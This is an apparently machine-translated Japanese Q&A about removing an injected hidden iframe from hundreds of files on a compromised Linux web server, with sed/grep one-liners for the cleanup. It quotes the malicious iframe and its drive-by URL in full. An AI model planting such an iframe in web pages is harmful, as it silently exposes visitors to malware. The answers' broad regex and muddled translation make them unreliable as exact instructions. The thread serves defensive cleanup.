1

Linux サーバーから次の iframe マルウェアを削除するスクリプトを探しています。

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>

私のサーバーのさまざまなWebサイトにある何百ものファイルに感染しました。私は試した

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

しかし、それはただ出力します:

    sed: -e expression #1, char 49: unknown option to `s'

あなたの助けに感謝 :)

乾杯ディー

4

2 に答える 2

1

sed 正規表現の URL からバックスラッシュをエスケープ解除します。

于 2013-05-15T08:03:02.933 に答える
0

これは、より一般的なソリューションである必要があります。マルウェアが実際に行うことは、 を探してその直前に</body>挿入することです。したがって、 の直前にある をiframe探して、だけに置き換えることができます。iframe</body></body>

# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'

マルウェア ファイルの名前変更に関するこの他の質問も、最後に拡張子を付けて名前を変更することで、侵害されたすべてのファイルをすばやく削除するのに役立ちます.hacked。次に、ハックを修正し、最後に削除することができます.hacked

于 2015-05-04T09:39:16.143 に答える